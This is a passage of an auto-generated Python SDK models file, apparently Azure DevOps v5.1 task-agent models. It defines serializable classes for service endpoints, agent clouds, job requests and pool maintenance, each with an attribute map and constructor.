'readers_group': {'key': 'readersGroup', 'type': 'IdentityRef'},
'type': {'key': 'type', 'type': 'str'},
'url': {'key': 'url', 'type': 'str'}
}
def __init__(self, administrators_group=None, authorization=None, created_by=None, data=None, description=None, group_scope_id=None, id=None, is_ready=None, is_shared=None, name=None, operation_status=None, owner=None, readers_group=None, type=None, url=None):
super(ServiceEndpoint, self).__init__()
self.administrators_group = administrators_group
self.authorization = authorization
self.created_by = created_by
self.data = data
self.description = description
self.group_scope_id = group_scope_id
self.id = id
self.is_ready = is_ready
self.is_shared = is_shared
self.name = name
self.operation_status = operation_status
self.owner = owner
self.readers_group = readers_group
self.type = type
self.url = url
class ServiceEndpointAuthenticationScheme(Model):
"""
:param authorization_headers: Gets or sets the authorization headers of service endpoint authentication scheme.
:type authorization_headers: list of :class:`AuthorizationHeader <azure.devops.v5_1.task_agent.models.AuthorizationHeader>`
:param client_certificates: Gets or sets the certificates of service endpoint authentication scheme.
:type client_certificates: list of :class:`ClientCertificate <azure.devops.v5_1.task_agent.models.ClientCertificate>`
:param display_name: Gets or sets the display name for the service endpoint authentication scheme.
:type display_name: str
:param input_descriptors: Gets or sets the input descriptors for the service endpoint authentication scheme.
:type input_descriptors: list of :class:`InputDescriptor <azure.devops.v5_1.task_agent.models.InputDescriptor>`
:param scheme: Gets or sets the scheme for service endpoint authentication.
:type scheme: str
"""
_attribute_map = {
'authorization_headers': {'key': 'authorizationHeaders', 'type': '[AuthorizationHeader]'},
'client_certificates': {'key': 'clientCertificates', 'type': '[ClientCertificate]'},
'display_name': {'key': 'displayName', 'type': 'str'},
'input_descriptors': {'key': 'inputDescriptors', 'type': '[InputDescriptor]'},
'scheme': {'key': 'scheme', 'type': 'str'}
}
def __init__(self, authorization_headers=None, client_certificates=None, display_name=None, input_descriptors=None, scheme=None):
super(ServiceEndpointAuthenticationScheme, self).__init__()
self.authorization_headers = authorization_headers
self.client_certificates = client_certificates
self.display_name = display_name
self.input_descriptors = input_descriptors
self.scheme = scheme
class ServiceEndpointDetails(Model):
"""
:param authorization:
:type authorization: :class:`EndpointAuthorization <azure.devops.v5_1.task_agent.models.EndpointAuthorization>`
:param data:
:type data: dict
:param type:
:type type: str
:param url:
:type url: str
"""
_attribute_map = {
'authorization': {'key': 'authorization', 'type': 'EndpointAuthorization'},
'data': {'key': 'data', 'type': '{str}'},
'type': {'key': 'type', 'type': 'str'},
'url': {'key': 'url', 'type': 'str'}
}
def __init__(self, authorization=None, data=None, type=None, url=None):
super(ServiceEndpointDetails, self).__init__()
self.authorization = authorization
self.data = data
self.type = type
self.url = url
class ServiceEndpointExecutionData(Model):
"""
Represents service endpoint execution data.
:param definition: Gets the definition of service endpoint execution owner.
:type definition: :class:`TaskOrchestrationOwner <azure.devops.v5_1.task_agent.models.TaskOrchestrationOwner>`
:param finish_time: Gets the finish time of service endpoint execution.
:type finish_time: datetime
:param id: Gets the Id of service endpoint execution data.
:type id: long
:param owner: Gets the owner of service endpoint execution data.
:type owner: :class:`TaskOrchestrationOwner <azure.devops.v5_1.task_agent.models.TaskOrchestrationOwner>`
:param plan_type: Gets the plan type of service endpoint execution data.
:type plan_type: str
:param result: Gets the result of service endpoint execution.
:type result: object
:param start_time: Gets the start time of service endpoint execution.
:type start_time: datetime
"""
_attribute_map = {
'definition': {'key': 'definition', 'type': 'TaskOrchestrationOwner'},
'finish_time': {'key': 'finishTime', 'type': 'iso-8601'},
'id': {'key': 'id', 'type': 'long'},
'owner': {'key': 'owner', 'type': 'TaskOrchestrationOwner'},
'plan_type': {'key': 'planType', 'type': 'str'},
'result': {'key': 'result', 'type': 'object'},
'start_time': {'key': 'startTime', 'type': 'iso-8601'}
}
def __init__(self, definition=None, finish_time=None, id=None, owner=None, plan_type=None, result=None, start_time=None):
super(ServiceEndpointExecutionData, self).__init__()
self.definition = definition
self.finish_time = finish_time
self.id = id
self.owner = owner
self.plan_type = plan_type
self.result = result
self.start_time = start_time
class ServiceEndpointExecutionRecord(Model):
"""
:param data: Gets the execution data of service endpoint execution.
:type data: :class:`ServiceEndpointExecutionData <azure.devops.v5_1.task_agent.models.ServiceEndpointExecutionData>`
:param endpoint_id: Gets the Id of service endpoint.
:type endpoint_id: str
"""
_attribute_map = {
'data': {'key': 'data', 'type': 'ServiceEndpointExecutionData'},
'endpoint_id': {'key': 'endpointId', 'type': 'str'}
}
def __init__(self, data=None, endpoint_id=None):
super(ServiceEndpointExecutionRecord, self).__init__()
self.data = data
self.endpoint_id = endpoint_id
class ServiceEndpointExecutionRecordsInput(Model):
"""
:param data:
:type data: :class:`ServiceEndpointExecutionData <azure.devops.v5_1.task_agent.models.ServiceEndpointExecutionData>`
:param endpoint_ids:
:type endpoint_ids: list of str
"""
_attribute_map = {
'data': {'key': 'data', 'type': 'ServiceEndpointExecutionData'},
'endpoint_ids': {'key': 'endpointIds', 'type': '[str]'}
}
def __init__(self, data=None, endpoint_ids=None):
super(ServiceEndpointExecutionRecordsInput, self).__init__()
self.data = data
self.endpoint_ids = endpoint_ids
class ServiceEndpointRequest(Model):
"""
:param data_source_details:
:type data_source_details: :class:`DataSourceDetails <azure.devops.v5_1.task_agent.models.DataSourceDetails>`
:param result_transformation_details:
:type result_transformation_details: :class:`ResultTransformationDetails <azure.devops.v5_1.task_agent.models.ResultTransformationDetails>`
:param service_endpoint_details:
:type service_endpoint_details: :class:`ServiceEndpointDetails <azure.devops.v5_1.task_agent.models.ServiceEndpointDetails>`
"""
_attribute_map = {
'data_source_details': {'key': 'dataSourceDetails', 'type': 'DataSourceDetails'},
'result_transformation_details': {'key': 'resultTransformationDetails', 'type': 'ResultTransformationDetails'},
'service_endpoint_details': {'key': 'serviceEndpointDetails', 'type': 'ServiceEndpointDetails'}
}
def __init__(self, data_source_details=None, result_transformation_details=None, service_endpoint_details=None):
super(ServiceEndpointRequest, self).__init__()
self.data_source_details = data_source_details
self.result_transformation_details = result_transformation_details
self.service_endpoint_details = service_endpoint_details
class ServiceEndpointRequestResult(Model):
"""
:param error_message:
:type error_message: str
:param result:
:type result: :class:`object <azure.devops.v5_1.task_agent.models.object>`
:param status_code:
:type status_code: object
"""
_attribute_map = {
'error_message': {'key': 'errorMessage', 'type': 'str'},
'result': {'key': 'result', 'type': 'object'},
'status_code': {'key': 'statusCode', 'type': 'object'}
}
def __init__(self, error_message=None, result=None, status_code=None):
super(ServiceEndpointRequestResult, self).__init__()
self.error_message = error_message
self.result = result
self.status_code = status_code
class ServiceEndpointType(Model):
"""
Represents type of the service endpoint.
:param authentication_schemes: Authentication scheme of service endpoint type.
:type authentication_schemes: list of :class:`ServiceEndpointAuthenticationScheme <azure.devops.v5_1.task_agent.models.ServiceEndpointAuthenticationScheme>`
:param data_sources: Data sources of service endpoint type.
:type data_sources: list of :class:`DataSource <azure.devops.v5_1.task_agent.models.DataSource>`
:param dependency_data: Dependency data of service endpoint type.
:type dependency_data: list of :class:`DependencyData <azure.devops.v5_1.task_agent.models.DependencyData>`
:param description: Gets or sets the description of service endpoint type.
:type description: str
:param display_name: Gets or sets the display name of service endpoint type.
:type display_name: str
:param endpoint_url: Gets or sets the endpoint url of service endpoint type.
:type endpoint_url: :class:`EndpointUrl <azure.devops.v5_1.task_agent.models.EndpointUrl>`
:param help_link: Gets or sets the help link of service endpoint type.
:type help_link: :class:`HelpLink <azure.devops.v5_1.task_agent.models.HelpLink>`
:param help_mark_down:
:type help_mark_down: str
:param icon_url: Gets or sets the icon url of service endpoint type.
:type icon_url: str
:param input_descriptors: Input descriptor of service endpoint type.
:type input_descriptors: list of :class:`InputDescriptor <azure.devops.v5_1.task_agent.models.InputDescriptor>`
:param name: Gets or sets the name of service endpoint type.
:type name: str
:param trusted_hosts: Trusted hosts of a service endpoint type.
:type trusted_hosts: list of str
:param ui_contribution_id: Gets or sets the ui contribution id of service endpoint type.
:type ui_contribution_id: str
"""
_attribute_map = {
'authentication_schemes': {'key': 'authenticationSchemes', 'type': '[ServiceEndpointAuthenticationScheme]'},
'data_sources': {'key': 'dataSources', 'type': '[DataSource]'},
'dependency_data': {'key': 'dependencyData', 'type': '[DependencyData]'},
'description': {'key': 'description', 'type': 'str'},
'display_name': {'key': 'displayName', 'type': 'str'},
'endpoint_url': {'key': 'endpointUrl', 'type': 'EndpointUrl'},
'help_link': {'key': 'helpLink', 'type': 'HelpLink'},
'help_mark_down': {'key': 'helpMarkDown', 'type': 'str'},
'icon_url': {'key': 'iconUrl', 'type': 'str'},
'input_descriptors': {'key': 'inputDescriptors', 'type': '[InputDescriptor]'},
'name': {'key': 'name', 'type': 'str'},
'trusted_hosts': {'key': 'trustedHosts', 'type': '[str]'},
'ui_contribution_id': {'key': 'uiContributionId', 'type': 'str'}
}
def __init__(self, authentication_schemes=None, data_sources=None, dependency_data=None, description=None, display_name=None, endpoint_url=None, help_link=None, help_mark_down=None, icon_url=None, input_descriptors=None, name=None, trusted_hosts=None, ui_contribution_id=None):
super(ServiceEndpointType, self).__init__()
self.authentication_schemes = authentication_schemes
self.data_sources = data_sources
self.dependency_data = dependency_data
self.description = description
self.display_name = display_name
self.endpoint_url = endpoint_url
self.help_link = help_link
self.help_mark_down = help_mark_down
self.icon_url = icon_url
self.input_descriptors = input_descriptors
self.name = name
self.trusted_hosts = trusted_hosts
self.ui_contribution_id = ui_contribution_id
class TaskAgentAuthorization(Model):
"""
Provides data necessary for authorizing the agent using OAuth 2.0 authentication flows.
:param authorization_url: Endpoint used to obtain access tokens from the configured token service.
:type authorization_url: str
:param client_id: Client identifier for this agent.
:type client_id: str
:param public_key: Public key used to verify the identity of this agent.
:type public_key: :class:`TaskAgentPublicKey <azure.devops.v5_1.task_agent.models.TaskAgentPublicKey>`
"""
_attribute_map = {
'authorization_url': {'key': 'authorizationUrl', 'type': 'str'},
'client_id': {'key': 'clientId', 'type': 'str'},
'public_key': {'key': 'publicKey', 'type': 'TaskAgentPublicKey'}
}
def __init__(self, authorization_url=None, client_id=None, public_key=None):
super(TaskAgentAuthorization, self).__init__()
self.authorization_url = authorization_url
self.client_id = client_id
self.public_key = public_key
class TaskAgentCloud(Model):
"""
:param acquire_agent_endpoint: Gets or sets a AcquireAgentEndpoint using which a request can be made to acquire new agent
:type acquire_agent_endpoint: str
:param acquisition_timeout:
:type acquisition_timeout: int
:param agent_cloud_id:
:type agent_cloud_id: int
:param get_account_parallelism_endpoint:
:type get_account_parallelism_endpoint: str
:param get_agent_definition_endpoint:
:type get_agent_definition_endpoint: str
:param get_agent_request_status_endpoint:
:type get_agent_request_status_endpoint: str
:param id:
:type id: str
:param internal: Signifies that this Agent Cloud is internal and should not be user-manageable
:type internal: bool
:param max_parallelism:
:type max_parallelism: int
:param name:
:type name: str
:param release_agent_endpoint:
:type release_agent_endpoint: str
:param shared_secret:
:type shared_secret: str
:param type: Gets or sets the type of the endpoint.
:type type: str
"""
_attribute_map = {
'acquire_agent_endpoint': {'key': 'acquireAgentEndpoint', 'type': 'str'},
'acquisition_timeout': {'key': 'acquisitionTimeout', 'type': 'int'},
'agent_cloud_id': {'key': 'agentCloudId', 'type': 'int'},
'get_account_parallelism_endpoint': {'key': 'getAccountParallelismEndpoint', 'type': 'str'},
'get_agent_definition_endpoint': {'key': 'getAgentDefinitionEndpoint', 'type': 'str'},
'get_agent_request_status_endpoint': {'key': 'getAgentRequestStatusEndpoint', 'type': 'str'},
'id': {'key': 'id', 'type': 'str'},
'internal': {'key': 'internal', 'type': 'bool'},
'max_parallelism': {'key': 'maxParallelism', 'type': 'int'},
'name': {'key': 'name', 'type': 'str'},
'release_agent_endpoint': {'key': 'releaseAgentEndpoint', 'type': 'str'},
'shared_secret': {'key': 'sharedSecret', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'}
}
def __init__(self, acquire_agent_endpoint=None, acquisition_timeout=None, agent_cloud_id=None, get_account_parallelism_endpoint=None, get_agent_definition_endpoint=None, get_agent_request_status_endpoint=None, id=None, internal=None, max_parallelism=None, name=None, release_agent_endpoint=None, shared_secret=None, type=None):
super(TaskAgentCloud, self).__init__()
self.acquire_agent_endpoint = acquire_agent_endpoint
self.acquisition_timeout = acquisition_timeout
self.agent_cloud_id = agent_cloud_id
self.get_account_parallelism_endpoint = get_account_parallelism_endpoint
self.get_agent_definition_endpoint = get_agent_definition_endpoint
self.get_agent_request_status_endpoint = get_agent_request_status_endpoint
self.id = id
self.internal = internal
self.max_parallelism = max_parallelism
self.name = name
self.release_agent_endpoint = release_agent_endpoint
self.shared_secret = shared_secret
self.type = type
class TaskAgentCloudRequest(Model):
"""
:param agent:
:type agent: :class:`TaskAgentReference <azure.devops.v5_1.task_agent.models.TaskAgentReference>`
:param agent_cloud_id:
:type agent_cloud_id: int
:param agent_connected_time:
:type agent_connected_time: datetime
:param agent_data:
:type agent_data: :class:`object <azure.devops.v5_1.task_agent.models.object>`
:param agent_specification:
:type agent_specification: :class:`object <azure.devops.v5_1.task_agent.models.object>`
:param pool:
:type pool: :class:`TaskAgentPoolReference <azure.devops.v5_1.task_agent.models.TaskAgentPoolReference>`
:param provisioned_time:
:type provisioned_time: datetime
:param provision_request_time:
:type provision_request_time: datetime
:param release_request_time:
:type release_request_time: datetime
:param request_id:
:type request_id: str
"""
_attribute_map = {
'agent': {'key': 'agent', 'type': 'TaskAgentReference'},
'agent_cloud_id': {'key': 'agentCloudId', 'type': 'int'},
'agent_connected_time': {'key': 'agentConnectedTime', 'type': 'iso-8601'},
'agent_data': {'key': 'agentData', 'type': 'object'},
'agent_specification': {'key': 'agentSpecification', 'type': 'object'},
'pool': {'key': 'pool', 'type': 'TaskAgentPoolReference'},
'provisioned_time': {'key': 'provisionedTime', 'type': 'iso-8601'},
'provision_request_time': {'key': 'provisionRequestTime', 'type': 'iso-8601'},
'release_request_time': {'key': 'releaseRequestTime', 'type': 'iso-8601'},
'request_id': {'key': 'requestId', 'type': 'str'}
}
def __init__(self, agent=None, agent_cloud_id=None, agent_connected_time=None, agent_data=None, agent_specification=None, pool=None, provisioned_time=None, provision_request_time=None, release_request_time=None, request_id=None):
super(TaskAgentCloudRequest, self).__init__()
self.agent = agent
self.agent_cloud_id = agent_cloud_id
self.agent_connected_time = agent_connected_time
self.agent_data = agent_data
self.agent_specification = agent_specification
self.pool = pool
self.provisioned_time = provisioned_time
self.provision_request_time = provision_request_time
self.release_request_time = release_request_time
self.request_id = request_id
class TaskAgentCloudType(Model):
"""
:param display_name: Gets or sets the display name of agent cloud type.
:type display_name: str
:param input_descriptors: Gets or sets the input descriptors
:type input_descriptors: list of :class:`InputDescriptor <azure.devops.v5_1.task_agent.models.InputDescriptor>`
:param name: Gets or sets the name of agent cloud type.
:type name: str
"""
_attribute_map = {
'display_name': {'key': 'displayName', 'type': 'str'},
'input_descriptors': {'key': 'inputDescriptors', 'type': '[InputDescriptor]'},
'name': {'key': 'name', 'type': 'str'}
}
def __init__(self, display_name=None, input_descriptors=None, name=None):
super(TaskAgentCloudType, self).__init__()
self.display_name = display_name
self.input_descriptors = input_descriptors
self.name = name
class TaskAgentDelaySource(Model):
"""
:param delays:
:type delays: list of object
:param task_agent:
:type task_agent: :class:`TaskAgentReference <azure.devops.v5_1.task_agent.models.TaskAgentReference>`
"""
_attribute_map = {
'delays': {'key': 'delays', 'type': '[object]'},
'task_agent': {'key': 'taskAgent', 'type': 'TaskAgentReference'}
}
def __init__(self, delays=None, task_agent=None):
super(TaskAgentDelaySource, self).__init__()
self.delays = delays
self.task_agent = task_agent
class TaskAgentJobRequest(Model):
"""
A job request for an agent.
:param agent_delays:
:type agent_delays: list of :class:`TaskAgentDelaySource <azure.devops.v5_1.task_agent.models.TaskAgentDelaySource>`
:param agent_specification:
:type agent_specification: :class:`object <azure.devops.v5_1.task_agent.models.object>`
:param assign_time: The date/time this request was assigned.
:type assign_time: datetime
:param data: Additional data about the request.
:type data: dict
:param definition: The pipeline definition associated with this request
:type definition: :class:`TaskOrchestrationOwner <azure.devops.v5_1.task_agent.models.TaskOrchestrationOwner>`
:param demands: A list of demands required to fulfill this request.
:type demands: list of :class:`object <azure.devops.v5_1.task_agent.models.object>`
:param expected_duration:
:type expected_duration: object
:param finish_time: The date/time this request was finished.
:type finish_time: datetime
:param host_id: The host which triggered this request.
:type host_id: str
:param job_id: ID of the job resulting from this request.
:type job_id: str
:param job_name: Name of the job resulting from this request.
:type job_name: str
:param locked_until: The deadline for the agent to renew the lock.
:type locked_until: datetime
:param matched_agents:
:type matched_agents: list of :class:`TaskAgentReference <azure.devops.v5_1.task_agent.models.TaskAgentReference>`
:param matches_all_agents_in_pool:
:type matches_all_agents_in_pool: bool
:param orchestration_id:
:type orchestration_id: str
:param owner: The pipeline associated with this request
:type owner: :class:`TaskOrchestrationOwner <azure.devops.v5_1.task_agent.models.TaskOrchestrationOwner>`
:param plan_group:
:type plan_group: str
:param plan_id: Internal ID for the orchestration plan connected with this request.
:type plan_id: str
:param plan_type: Internal detail representing the type of orchestration plan.
:type plan_type: str
:param pool_id: The ID of the pool this request targets
:type pool_id: int
:param queue_id: The ID of the queue this request targets
:type queue_id: int
:param queue_time: The date/time this request was queued.
:type queue_time: datetime
:param receive_time: The date/time this request was receieved by an agent.
:type receive_time: datetime
:param request_id: ID of the request.
:type request_id: long
:param reserved_agent: The agent allocated for this request.
:type reserved_agent: :class:`TaskAgentReference <azure.devops.v5_1.task_agent.models.TaskAgentReference>`
:param result: The result of this request.
:type result: object
:param scope_id: Scope of the pipeline; matches the project ID.
:type scope_id: str
:param service_owner: The service which owns this request.
:type service_owner: str
:param status_message:
:type status_message: str
:param user_delayed:
:type user_delayed: bool
"""
_attribute_map = {
'agent_delays': {'key': 'agentDelays', 'type': '[TaskAgentDelaySource]'},
'agent_specification': {'key': 'agentSpecification', 'type': 'object'},
'assign_time': {'key': 'assignTime', 'type': 'iso-8601'},
'data': {'key': 'data', 'type': '{str}'},
'definition': {'key': 'definition', 'type': 'TaskOrchestrationOwner'},
'demands': {'key': 'demands', 'type': '[object]'},
'expected_duration': {'key': 'expectedDuration', 'type': 'object'},
'finish_time': {'key': 'finishTime', 'type': 'iso-8601'},
'host_id': {'key': 'hostId', 'type': 'str'},
'job_id': {'key': 'jobId', 'type': 'str'},
'job_name': {'key': 'jobName', 'type': 'str'},
'locked_until': {'key': 'lockedUntil', 'type': 'iso-8601'},
'matched_agents': {'key': 'matchedAgents', 'type': '[TaskAgentReference]'},
'matches_all_agents_in_pool': {'key': 'matchesAllAgentsInPool', 'type': 'bool'},
'orchestration_id': {'key': 'orchestrationId', 'type': 'str'},
'owner': {'key': 'owner', 'type': 'TaskOrchestrationOwner'},
'plan_group': {'key': 'planGroup', 'type': 'str'},
'plan_id': {'key': 'planId', 'type': 'str'},
'plan_type': {'key': 'planType', 'type': 'str'},
'pool_id': {'key': 'poolId', 'type': 'int'},
'queue_id': {'key': 'queueId', 'type': 'int'},
'queue_time': {'key': 'queueTime', 'type': 'iso-8601'},
'receive_time': {'key': 'receiveTime', 'type': 'iso-8601'},
'request_id': {'key': 'requestId', 'type': 'long'},
'reserved_agent': {'key': 'reservedAgent', 'type': 'TaskAgentReference'},
'result': {'key': 'result', 'type': 'object'},
'scope_id': {'key': 'scopeId', 'type': 'str'},
'service_owner': {'key': 'serviceOwner', 'type': 'str'},
'status_message': {'key': 'statusMessage', 'type': 'str'},
'user_delayed': {'key': 'userDelayed', 'type': 'bool'}
}
def __init__(self, agent_delays=None, agent_specification=None, assign_time=None, data=None, definition=None, demands=None, expected_duration=None, finish_time=None, host_id=None, job_id=None, job_name=None, locked_until=None, matched_agents=None, matches_all_agents_in_pool=None, orchestration_id=None, owner=None, plan_group=None, plan_id=None, plan_type=None, pool_id=None, queue_id=None, queue_time=None, receive_time=None, request_id=None, reserved_agent=None, result=None, scope_id=None, service_owner=None, status_message=None, user_delayed=None):
super(TaskAgentJobRequest, self).__init__()
self.agent_delays = agent_delays
self.agent_specification = agent_specification
self.assign_time = assign_time
self.data = data
self.definition = definition
self.demands = demands
self.expected_duration = expected_duration
self.finish_time = finish_time
self.host_id = host_id
self.job_id = job_id
self.job_name = job_name
self.locked_until = locked_until
self.matched_agents = matched_agents
self.matches_all_agents_in_pool = matches_all_agents_in_pool
self.orchestration_id = orchestration_id
self.owner = owner
self.plan_group = plan_group
self.plan_id = plan_id
self.plan_type = plan_type
self.pool_id = pool_id
self.queue_id = queue_id
self.queue_time = queue_time
self.receive_time = receive_time
self.request_id = request_id
self.reserved_agent = reserved_agent
self.result = result
self.scope_id = scope_id
self.service_owner = service_owner
self.status_message = status_message
self.user_delayed = user_delayed
class TaskAgentMessage(Model):
"""
Provides a contract for receiving messages from the task orchestrator.
:param body: Gets or sets the body of the message. If the <c>IV</c> property is provided the body will need to be decrypted using the <c>TaskAgentSession.EncryptionKey</c> value in addition to the <c>IV</c>.
:type body: str
:param iv: Gets or sets the initialization vector used to encrypt this message.
:type iv: str
:param message_id: Gets or sets the message identifier.
:type message_id: long
:param message_type: Gets or sets the message type, describing the data contract found in <c>TaskAgentMessage.Body</c>.
:type message_type: str
"""
_attribute_map = {
'body': {'key': 'body', 'type': 'str'},
'iv': {'key': 'iv', 'type': 'str'},
'message_id': {'key': 'messageId', 'type': 'long'},
'message_type': {'key': 'messageType', 'type': 'str'}
}
def __init__(self, body=None, iv=None, message_id=None, message_type=None):
super(TaskAgentMessage, self).__init__()
self.body = body
self.iv = iv
self.message_id = message_id
self.message_type = message_type
class TaskAgentPoolMaintenanceDefinition(Model):
"""
:param enabled: Enable maintenance
:type enabled: bool
:param id: Id
:type id: int
:param job_timeout_in_minutes: Maintenance job timeout per agent
:type job_timeout_in_minutes: int
:param max_concurrent_agents_percentage: Max percentage of agents within a pool running maintenance job at given time
:type max_concurrent_agents_percentage: int
:param options:
:type options: :class:`TaskAgentPoolMaintenanceOptions <azure.devops.v5_1.task_agent.models.TaskAgentPoolMaintenanceOptions>`
:param pool: Pool reference for the maintenance definition
:type pool: :class:`TaskAgentPoolReference <azure.devops.v5_1.task_agent.models.TaskAgentPoolReference>`
:param retention_policy:
:type retention_policy: :class:`TaskAgentPoolMaintenanceRetentionPolicy <azure.devops.v5_1.task_agent.models.TaskAgentPoolMaintenanceRetentionPolicy>`
:param schedule_setting:
:type schedule_setting: :class:`TaskAgentPoolMaintenanceSchedule <azure.devops.v5_1.task_agent.models.TaskAgentPoolMaintenanceSchedule>`
"""
_attribute_map = {
'enabled': {'key': 'enabled', 'type': 'bool'},
'id': {'key': 'id', 'type': 'int'},
'job_timeout_in_minutes': {'key': 'jobTimeoutInMinutes', 'type': 'int'},
'max_concurrent_agents_percentage': {'key': 'maxConcurrentAgentsPercentage', 'type': 'int'},
'options': {'key': 'options', 'type': 'TaskAgentPoolMaintenanceOptions'},
'pool': {'key': 'pool', 'type': 'TaskAgentPoolReference'},
'retention_policy': {'key': 'retentionPolicy', 'type': 'TaskAgentPoolMaintenanceRetentionPolicy'},
'schedule_setting': {'key': 'scheduleSetting', 'type': 'TaskAgentPoolMaintenanceSchedule'}
}
def __init__(self, enabled=None, id=None, job_timeout_in_minutes=None, max_concurrent_agents_percentage=None, options=None, pool=None, retention_policy=None, schedule_setting=None):
super(TaskAgentPoolMaintenanceDefinition, self).__init__()
self.enabled = enabled
self.id = id
self.job_timeout_in_minutes = job_timeout_in_minutes
self.max_concurrent_agents_percentage = max_concurrent_agents_percentage
self.options = options
self.pool = pool
self.retention_policy = retention_policy
self.schedule_setting = schedule_setting
class TaskAgentPoolMaintenanceJob(Model):
"""
:param definition_id: The maintenance definition for the maintenance job
:type definition_id: int
:param error_count: The total error counts during the maintenance job
:type error_count: int
:param finish_time: Time that the maintenance job was completed
:type finish_time: datetime
:param job_id: Id of the maintenance job
:type job_id: int
:param logs_download_url: The log download url for the maintenance job
:type logs_download_url: str
:param orchestration_id: Orchestration/Plan Id for the maintenance job
:type orchestration_id: str
:param pool: Pool reference for the maintenance job
:type pool: :class:`TaskAgentPoolReference <azure.devops.v5_1.task_agent.models.TaskAgentPoolReference>`
:param queue_time: Time that the maintenance job was queued
:type queue_time: datetime
:param requested_by: The identity that queued the maintenance job
:type requested_by: :class:`IdentityRef <azure.devops.v5_1.task_agent.models.IdentityRef>`
:param result: The maintenance job result
:type result: object
:param start_time: Time that the maintenance job was started
:type start_time: datetime
:param status: Status of the maintenance job
:type status: object
:param target_agents:
:type target_agents: list of :class:`TaskAgentPoolMaintenanceJobTargetAgent <azure.devops.v5_1.task_agent.models.TaskAgentPoolMaintenanceJobTargetAgent>`
:param warning_count: The total warning counts during the maintenance job
:type warning_count: int
"""
_attribute_map = {
'definition_id': {'key': 'definitionId', 'type': 'int'},
'error_count': {'key': 'errorCount', 'type': 'int'},
'finish_time': {'key': 'finishTime', 'type': 'iso-8601'},
'job_id': {'key': 'jobId', 'type': 'int'},
'logs_download_url': {'key': 'logsDownloadUrl', 'type': 'str'},
'orchestration_id': {'key': 'orchestrationId', 'type': 'str'},
'pool': {'key': 'pool', 'type': 'TaskAgentPoolReference'},
'queue_time': {'key': 'queueTime', 'type': 'iso-8601'},
'requested_by': {'key': 'requestedBy', 'type': 'IdentityRef'},
'result': {'key': 'result', 'type': 'object'},
'start_time': {'key': 'startTime', 'type': 'iso-8601'},
'status': {'key': 'status', 'type': 'object'},
'target_agents': {'key': 'targetAgents', 'type': '[TaskAgentPoolMaintenanceJobTargetAgent]'},
'warning_count': {'key': 'warningCount', 'type': 'int'}
}
def __init__(self, definition_id=None, error_count=None, finish_time=None, job_id=None, logs_download_url=None, orchestration_id=None, pool=None, queue_time=None, requested_by=None, result=None, start_time=None, status=None, target_agents=None, warning_count=None):
super(TaskAgentPoolMaintenanceJob, self).__init__()
self.definition_id = definition_id
self.error_count = error_count
self.finish_time = finish_time
self.job_id = job_id
self.logs_download_url = logs_download_url
self.orchestration_id = orchestration_id
self.pool = pool
self.queue_time = queue_time
self.requested_by = requested_by
self.result = result
self.start_time = start_time
self.status = status
self.target_agents = target_agents
self.warning_count = warning_count
class TaskAgentPoolMaintenanceJobTargetAgent(Model):
"""
:param agent:
:type agent: :class:`TaskAgentReference <azure.devops.v5_1.task_agent.models.TaskAgentReference>`
:param job_id:
:type job_id: int
:param result:
:type result: object
:param status:
:type status: object
"""
_attribute_map = {
'agent': {'key': 'agent', 'type': 'TaskAgentReference'},
'job_id': {'key': 'jobId', 'type': 'int'},
'result': {'key': 'result', 'type': 'object'},
'status': {'key': 'status', 'type': 'object'}
}
def __init__(self, agent=None, job_id=None, result=None, status=None):
super(TaskAgentPoolMaintenanceJobTargetAgent, self).__init__()
self.agent = agent
self.job_id = job_id
self.result = result
self.status = status
class TaskAgentPoolMaintenanceOptions(Model):
"""
:param working_directory_expiration_in_days: time to consider a System.DefaultWorkingDirectory is stale
:type working_directory_expiration_in_days: int
"""
_attribute_map = {
'working_directory_expiration_in_days': {'key': 'workingDirectoryExpirationInDays', 'type': 'int'}
}
def __init__(self, working_directory_expiration_in_days=None):
super(TaskAgentPoolMaintenanceOptions, self).__init__()
self.working_directory_expiration_in_days = working_directory_expiration_in_days
class TaskAgentPoolMaintenanceRetentionPolicy(Model):
"""
:param number_of_history_records_to_keep: Number of records to keep for maintenance job executed with this definition.
:type number_of_history_records_to_keep: int
"""
_attribute_map = {
'number_of_history_records_to_keep': {'key': 'numberOfHistoryRecordsToKeep', 'type': 'int'}
}
def __init__(self, number_of_history_records_to_keep=None):
super(TaskAgentPoolMaintenanceRetentionPolicy, self).__init__()
self.number_of_history_records_to_keep = number_of_history_records_to_keep
class TaskAgentPoolMaintenanceSchedule(Model):
"""
:param days_to_build: Days for a build (flags enum for days of the week)
:type days_to_build: object
:param schedule_job_id: The Job Id of the Scheduled job that will queue the pool maintenance job.
:type schedule_job_id: str
:param start_hours: Local timezone hour to start
:type start_hours: int
:param start_minutes: Local timezone minute to start
:type start_minutes: int
:param time_zone_id: Time zone of the build schedule (string representation of the time zone id)
:type time_zone_id: str
"""
_attribute_map = {
'days_to_build': {'key': 'daysToBuild', 'type': 'object'},
'schedule_job_id': {'key': 'scheduleJobId', 'type': 'str'},
'start_hours': {'key': 'startHours', 'type': 'int'},
'start_minutes': {'key': 'startMinutes', 'type': 'int'},
'time_zone_id': {'key': 'timeZoneId', 'type': 'str'}
}
def __init__(self, days_to_build=None, schedule_job_id=None, start_hours=None, start_minutes=None, time_zone_id=None):
super(TaskAgentPoolMaintenanceSchedule, self).__init__()
self.days_to_build = days_to_build
self.schedule_job_id = schedule_job_id
self.start_hours = start_hours
self.start_minutes = start_minutes
self.time_zone_id = time_zone_id
class TaskAgentPoolReference(Model):
"""
:param id:
:type id: int
:param is_hosted: Gets or sets a value indicating whether or not this pool is managed by the service.
:type is_hosted: bool
:param is_legacy: Determines whether the pool is legacy.
:type is_legacy: bool
:param name:
:type name: str
:param pool_type: Gets or sets the type of the pool
:type pool_type: object
:param scope:
:type scope: str
:param size: Gets the current size of the pool.
:type size: int
"""
_attribute_map = {
'id': {'key': 'id', 'type': 'int'},
'is_hosted': {'key': 'isHosted', 'type': 'bool'},
'is_legacy': {'key': 'isLegacy', 'type': 'bool'},
'name': {'key': 'name', 'type': 'str'},
'pool_type': {'key': 'poolType', 'type': 'object'},
'scope': {'key': 'scope', 'type': 'str'},
'size': {'key': 'size', 'type': 'int'}
}
def __init__(self, id=None, is_hosted=None, is_legacy=None, name=None, pool_type=None, scope=None, size=None):
super(TaskAgentPoolReference, self).__init__()
self.id = id
self.is_hosted = is_hosted
self.is_legacy = is_legacy
self.name = name
self.pool_type = pool_type
self.scope = scope
self.size = size
class TaskAgentPublicKey(Model):
"""
Represents the public key portion of an RSA asymmetric key.
:param exponent: Gets or sets the exponent for the public key.
:type exponent: str
:param modulus: Gets or sets the modulus for the public key.
:type modulus: str
"""
